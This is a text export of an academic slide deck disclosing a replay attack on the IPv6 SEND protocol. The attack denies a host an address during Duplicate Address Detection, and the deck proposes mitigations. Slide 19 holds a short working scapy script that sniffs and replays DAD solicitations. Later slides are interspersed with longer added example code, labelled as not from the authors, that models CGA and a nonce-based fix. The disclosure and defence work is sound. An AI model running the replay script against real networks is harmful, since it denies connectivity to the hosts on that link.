A replay attack on the SEND protocol (Une attaque par rejeu sur le protocole SEND), PowerPoint presentation

SLIDE 1

A replay attack on the SEND protocol

Tony Cheneau (Télécom SudParis), mail: tony.cheneau@it-sudparis.eu
& Jean-Michel Combes (FT R&D), mail: jeanmichel.combes@orange-ftgroup.com

October 17, 2008, SAR-SSI'2008

SLIDE 2

October 19, 2008 Tony Cheneau & Jean-Michel Combes 2

Summary

  • Quick IPv6 Introduction
  • Neighbor Discovery Protocol
  • Attacks on the Neighbor Discovery Protocol
  • Cryptographically Generated Addresses
  • Secure Neighbor Discovery Protocol
  • The attack on the SEND protocol
  • Solutions to mitigate/avoid the attack
  • Conclusion
SLIDE 3

Quick IPv6 introduction (1/3)

Facts everyone knows:

  • 2^128 addresses available
  • Less work on routers
  • Stateless Address Autoconfiguration
SLIDE 4

Quick IPv6 introduction (2/3)

How to compute an IPv6 address?

SLIDE 5

Quick IPv6 introduction (3/3)

SLIDE 6

Neighbor Discovery Protocol (1/4)

  • NDP offers:

    – Router Discovery
    – Prefix Discovery
    – Parameter Discovery
    – Stateless Address Autoconfiguration
    – Address Resolution (similar to ARP in IPv4)
    – Next Hop Determination
    – Neighbor Unreachability Detection
    – Duplicate Address Detection (useful for Stateless Autoconfiguration, also called DAD)
    – Redirection (equivalent to ICMPv4 redirect)

SLIDE 7

Neighbor Discovery Protocol (2/4)

  • 5 types of messages:

    – Neighbour Solicitation (NS)
    – Neighbour Advertisement (NA)
    – Router Solicitation
    – Router Advertisement
    – Redirect

SLIDE 8

Neighbor Discovery Protocol (3/4)

Address Resolution

SLIDE 9

Neighbor Discovery Protocol (4/4)

Duplicate Address Detection

Failure when:

  • a node already possesses the address
  • a node is willing to obtain the same address

Success when:

  • no node currently owns the address

SLIDE 10

Attacks on the Neighbor Discovery Protocol

3 kinds of attacks:

  • routing related
  • not routing related:

    – Neighbor Solicitation/Advertisement Spoofing
    – Neighbor Unreachability Detection Failure
    – Duplicate Address Detection DoS Attack

  • replay attacks (not really useful) or attacks outside a network (much more interesting)
SLIDE 11

Cryptographically Generated Addresses (1/3)

  • Main principles:

    – bind a public key to an IPv6 address with a hash algorithm (but anybody can do this)
    – the public key can be generated at connection time, and so can the CGA (this allows autoconfiguration)

  • Details:

    – a whole set of parameters is bound to the address

SLIDE 12

Cryptographically Generated Addresses (2/3)

CGA parameter structure:

  • a part of the hash of this structure will form the interface identifier
  • this structure will also be used in SEND
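To make the binding described on these two slides concrete, here is an added example (not code from the slides or from the authors) that generates and verifies a CGA as specified in RFC 3972: the parameter structure (modifier, subnet prefix, collision count, public key) is hashed, the leftmost 64 bits of that hash become the interface identifier, and the Hash2 condition on the modifier implements the Sec hash extension. It assumes the documentation prefix 2001:db8::/64, a constructed byte string PUBKEY_DER standing in for a DER-encoded public key, and exercises only Sec values 0 and 1.

```python
# Added example, not from the slides: CGA generation and verification per RFC 3972.
# PUBKEY_DER is a constructed placeholder for a DER-encoded public key, not a real key.
import hashlib
import ipaddress
import os
from typing import Optional, Tuple

PREFIX = ipaddress.IPv6Address("2001:db8::").packed[:8]              # documentation prefix, assumed
PUBKEY_DER = b"CONSTRUCTED-PLACEHOLDER-FOR-DER-ENCODED-PUBLIC-KEY"  # constructed, not a real key


def cga_params(modifier: bytes, prefix: bytes, collision_count: int, pubkey_der: bytes) -> bytes:
    """Serialize the CGA Parameters structure (RFC 3972 section 3):
    modifier (16) || subnet prefix (8) || collision count (1) || public key."""
    if len(modifier) != 16 or len(prefix) != 8 or not 0 <= collision_count <= 2:
        raise ValueError("malformed CGA parameters")
    return modifier + prefix + bytes([collision_count]) + pubkey_der


def hash1(params: bytes) -> bytes:
    """Leftmost 64 bits of SHA-1 over the whole parameter structure."""
    return hashlib.sha1(params).digest()[:8]


def hash2(modifier: bytes, pubkey_der: bytes) -> bytes:
    """Leftmost 112 bits of SHA-1 over modifier || 9 zero bytes || public key
    (prefix and collision count are zeroed, so Hash2 does not depend on the prefix)."""
    return hashlib.sha1(modifier + bytes(9) + pubkey_der).digest()[:14]


def interface_id(params: bytes, sec: int) -> bytes:
    """Hash1 with Sec written into bits 0-2 and the u/g bits (6 and 7) cleared."""
    iid = bytearray(hash1(params))
    iid[0] = (iid[0] & 0x1C) | (sec << 5)
    return bytes(iid)


def find_modifier(pubkey_der: bytes, sec: int, start: Optional[bytes] = None) -> bytes:
    """Search a modifier whose Hash2 starts with 16*Sec zero bits; this hash
    extension is what makes brute-forcing a CGA costlier. Sec=0 needs no search."""
    value = int.from_bytes(start or os.urandom(16), "big")
    while True:
        modifier = (value % (1 << 128)).to_bytes(16, "big")
        if sec == 0 or hash2(modifier, pubkey_der)[: 2 * sec] == bytes(2 * sec):
            return modifier
        value += 1


def generate_cga(prefix: bytes, pubkey_der: bytes, sec: int,
                 start_modifier: Optional[bytes] = None) -> Tuple[ipaddress.IPv6Address, bytes]:
    """Return (address, parameters). The collision count stays 0 here; a real node
    increments it (at most to 2) each time DAD reports a duplicate and regenerates."""
    modifier = find_modifier(pubkey_der, sec, start_modifier)
    params = cga_params(modifier, prefix, 0, pubkey_der)
    return ipaddress.IPv6Address(prefix + interface_id(params, sec)), params


def verify_cga(addr: ipaddress.IPv6Address, params: bytes) -> bool:
    """RFC 3972 section 5 checks: collision count, prefix, Hash1 (ignoring the
    Sec/u/g bits) and the Hash2 condition. This only binds key and address; it does
    not prove ownership, which in SEND comes from the RSA Signature option."""
    if len(params) < 25:
        return False
    modifier, prefix, collision_count, pubkey_der = params[:16], params[16:24], params[24], params[25:]
    packed = addr.packed
    if collision_count > 2 or packed[:8] != prefix:
        return False
    sec, iid, h1 = packed[8] >> 5, packed[8:], hash1(params)
    if (iid[0] & 0x1C) != (h1[0] & 0x1C) or iid[1:] != h1[1:]:
        return False
    return sec == 0 or hash2(modifier, pubkey_der)[: 2 * sec] == bytes(2 * sec)


if __name__ == "__main__":
    address, parameters = generate_cga(PREFIX, PUBKEY_DER, sec=1, start_modifier=bytes(16))
    print(address, verify_cga(address, parameters))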

SLIDE 13

Cryptographically Generated Addresses (3/3)

SLIDE 14

Secure Neighbor Discovery Protocol (1/2)

  • Relies heavily on CGA
  • Secures the ICMPv6 messages used in NDP
  • Protects against address spoofing
  • Introduces options:

    – Timestamp (prevents replay attacks)
    – Nonce (supposedly prevents replay attacks)
    – CGA option
    – RSA signature option (actually proves the ownership of the address)
SLIDE 15

Secure Neighbor Discovery Protocol (2/2)

SLIDE 16

The attack on SEND (1/3)

  • Attacker: sends back the NS it receives during the victim's DAD process.
  • Effect of the attack: the victim node can't get an address.

SLIDE 17

The attack on SEND (2/3)

  • Requirement on the link:

    – can listen to the DAD procedure of other nodes:

      • hub
      • non-protected wireless interface
      • ...

  • Requirement on the timing of the replay attack:

    – packet is replayed within 1 second

SLIDE 18

The attack on SEND (3/3)

Why does it work?

  • signature option/CGA are correct (it is only a replay)
  • unspecified address as source of the packet
  • timestamp is valid: the victim compares it against its own clock
  • the nonce option has no semantics in this case...
SLIDE 19

Proof of Concept

Using scapy6 [1]:

```python
from scapy6 import *   # scapy6 IPv6 extension of Scapy (IPv6 support is now part of scapy.all)

# network interface on which we will listen to packets
conf.iface = 'eth0'

# listen on an interface
sniff(store=0, filter="ip6",
      # listen only to the NS used for DAD (source is the unspecified address ::)
      lfilter=lambda x: x.haslayer(ICMPv6ND_NS) and x.getlayer(IPv6).src == "::",
      # replay the packet
      prn=lambda x: sendp(x),
      count=0)
```

[1]: http://namabiiru.hongo.wide.ad.jp/scapy6/

I would be pleased to know if anyone in this room has a complete implementation of SEND to test this code.

SLIDE 20

Solutions to mitigate/avoid the attack

  • Disable the DAD procedure:

    – fairly easy
    – not backward compatible and not recommended

  • Try 3 different address generations and ignore the last NS:

    – three collisions with the same node have a low probability
    – backward compatible

  • Give semantics to the Nonce option:

    – in an NS received during a DAD process, the Nonce value has to differ from the one this node sent in its own NS
    – backward compatible
    – no (known) side effect
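The following added example (not code from the slides or from the authors) models the DAD outcome rules of the "Neighbor Discovery Protocol (4/4)" slide, the reason the replay succeeds from "The attack on SEND (3/3)", and the last two mitigations above, in one small state machine. With legacy handling, a replayed copy of the node's own DAD NS is indistinguishable from a competing node and DAD fails; with the proposed Nonce semantics, an NS that echoes the node's own nonce is recognised as its own packet and ignored, while a different nonce is still a real conflict. It assumes messages represented as plain dataclasses, that CGA and RSA signature validation have already passed (as they do on a replayed packet), a clock_skew window that is a parameter of this example rather than a value from the deck, and our reading of the "three address generations" fallback (a third conflict in a row is treated as a replay and the third address is kept).

```python
# Added example, not from the slides: DAD with the proposed Nonce semantics.
from dataclasses import dataclass
import secrets
from typing import Callable, List, Optional

UNSPECIFIED = "::"


@dataclass(frozen=True)
class NeighborSolicitation:
    src: str          # IPv6 source; "::" while the sender is still performing DAD
    target: str       # tentative address being probed
    nonce: bytes      # SEND Nonce option (RFC 3971: at least 6 random bytes)
    timestamp: float  # SEND Timestamp option, in seconds


class DadProcess:
    """One Duplicate Address Detection run for a tentative address."""

    def __init__(self, tentative: str, now: float, nonce_semantics: bool = True,
                 clock_skew: float = 1.0):
        self.tentative = tentative
        self.nonce = secrets.token_bytes(6)
        self.started = now
        self.nonce_semantics = nonce_semantics   # False = behaviour described on the slides
        self.clock_skew = clock_skew             # assumption: accepted |own clock - timestamp|
        self.state = "tentative"                 # -> "duplicate" or "assigned"
        self.log: List[str] = []

    def solicit(self) -> NeighborSolicitation:
        """The NS this node puts on the link to probe its tentative address."""
        return NeighborSolicitation(UNSPECIFIED, self.tentative, self.nonce, self.started)

    def on_solicitation(self, ns: NeighborSolicitation, now: float) -> None:
        """Handle an incoming DAD NS (CGA and signature assumed already verified)."""
        if self.state != "tentative" or ns.target != self.tentative or ns.src != UNSPECIFIED:
            return                                       # not about our DAD
        if abs(now - ns.timestamp) > self.clock_skew:
            self.log.append("timestamp outside window, dropped")
            return
        if self.nonce_semantics and ns.nonce == self.nonce:
            # Our own nonce coming back: no other node chose it, so this is a
            # replayed copy of our NS rather than a competing node.
            self.log.append("own nonce echoed back: replay ignored")
            return
        self.state = "duplicate"
        self.log.append("conflict: another node is probing the same address")

    def finish(self) -> str:
        """Called when the DAD timer expires: no conflict seen means the address is ours."""
        if self.state == "tentative":
            self.state = "assigned"
        return self.state


Adversary = Callable[[NeighborSolicitation], List[NeighborSolicitation]]


def run_dad(addr: str, adversary: Adversary, now: float, nonce_semantics: bool = True) -> str:
    """Run one DAD round; `adversary` returns whatever the link sends back within the window."""
    dad = DadProcess(addr, now, nonce_semantics)
    for ns in adversary(dad.solicit()):
        dad.on_solicitation(ns, now + 0.5)
    return dad.finish()


def dad_with_retries(candidates: List[str], adversary: Adversary, now: float,
                     max_attempts: int = 3) -> Optional[str]:
    """Second mitigation on the slide, as we read it: try up to three generated
    addresses with legacy nonce handling; three conflicts in a row are far more
    likely a replay than three real collisions, so the last NS is ignored."""
    for attempt, addr in enumerate(candidates[:max_attempts], start=1):
        if run_dad(addr, adversary, now, nonce_semantics=False) == "assigned" or attempt == max_attempts:
            return addr
    return None


# constructed link behaviours: one echoes every DAD NS it hears, one stays silent
REPLAYER: Adversary = lambda ns: [ns]
SILENT: Adversary = lambda ns: []


def other_node_probing(target: str, timestamp: float) -> NeighborSolicitation:
    """Constructed NS from a genuine second node that wants the same address."""
    return NeighborSolicitation(UNSPECIFIED, target, secrets.token_bytes(6), timestamp)


if __name__ == "__main__":
    print("legacy SEND, replayed NS:", run_dad("2001:db8::1", REPLAYER, 10.0, nonce_semantics=False))
    print("nonce semantics, replayed NS:", run_dad("2001:db8::1", REPLAYER, 10.0))
    print("nonce semantics, real conflict:",
          run_dad("2001:db8::1", lambda ns: [other_node_probing(ns.target, 10.2)], 10.0))
```

The nonce check is cheap and needs no change on other nodes, which is why the slide calls it backward compatible: a node that does not implement it simply keeps the legacy behaviour, and nodes that do implement it only change how they interpret a packet they themselves emitted.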

SLIDE 21

Conclusion

  • The National Institute of Standards and Technology (NIST) is to advise the use of SEND in IPv6 deployments
  • A new working group is forming in the IETF (CSI); we will advise them to correct the flaw in the next specification

Any questions?

SLIDE 22

SEND daemon

Details on NTT Docomo implementation:

SLIDE 23

SEND Deployment

SLIDE 24

Certification Path in SEND